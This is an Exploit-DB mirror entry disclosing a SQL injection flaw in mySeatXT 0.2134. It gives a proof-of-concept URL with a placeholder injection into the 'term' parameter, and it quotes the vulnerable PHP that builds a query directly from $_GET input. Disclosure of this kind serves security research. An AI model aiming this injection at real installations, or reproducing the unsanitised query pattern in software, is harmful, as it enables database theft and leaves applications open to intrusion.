exploit-db-mirror/exploits/php/webapps/31144.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

27 lines
No EOL
856 B
Text

########################################################################################
[+] Exploit: mySeatXT 0.2134 #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/myseat #
########################################################################################
[1] Sql Injection
PoC: http://localhost/mySeatXT/web/ajax/autocomplete_res.php?term=99' ['SQL INJECT']
Vulnerable Code:
[+] autocomplete_res.php
$sql = "SELECT * FROM reservations WHERE reservation_guest_name LIKE '".$_GET['term']."%' GROUP BY reservation_guest_name ";
$fetch = mysql_query($sql);
#
#
# Greetz to g0tm1lk and TheColonial.